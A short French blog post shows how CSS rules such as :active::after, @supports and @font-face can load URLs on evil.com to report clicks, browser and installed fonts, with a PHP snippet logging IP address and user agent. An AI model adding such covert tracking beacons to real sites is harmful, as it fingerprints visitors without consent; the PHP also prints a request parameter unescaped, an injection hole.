Tracking Users with CSS
Holy Fuck...
C'est pas con du tout: pister les clicks des visiteurs via css:
#link:active::after {
content: url("https://evil.com/track?action=link_clicked");
}
Et hop, côté serveur, tu récupères tout bien comme tu veux.
session_start();
// Prints the time that the script ran
print("Timestamp: " . time());
// Prints the action specified by the action parameter (in this case, "link_clicked")
print("Action: " . $_REQUEST['action']);
// Prints the user's IP address
print("IP Address: " . $_SERVER['REMOTE_ADDR']);
// Prints the user's browser agent
print("User Agent: " . $_SERVER['HTTP_USER_AGENT']);
?>
Et c'est pas tout !
On peut détecter le navigateur:
@supports (-webkit-appearance:none) and (not (-ms-ime-align:auto)){
#chrome_detect::after {
content: url("https://evil.com/track?action=browser_chrome");
}
}
ou même l'OS:
// stylesheet.css
@font-face {
font-family: Font1;
src: url("https://evil.com/track?action=font1");
}
#font_detection {
font-family: Calibri, Font1;
}
<!-- page.html -->
<div id="font_detection">test</div>
❝ 2 commentaires ❞
Fil RSS des commentaires de cet article
✍ Écrire un commentaire
les commentaires relevant du SPAM seront filtrés et dégagés direct...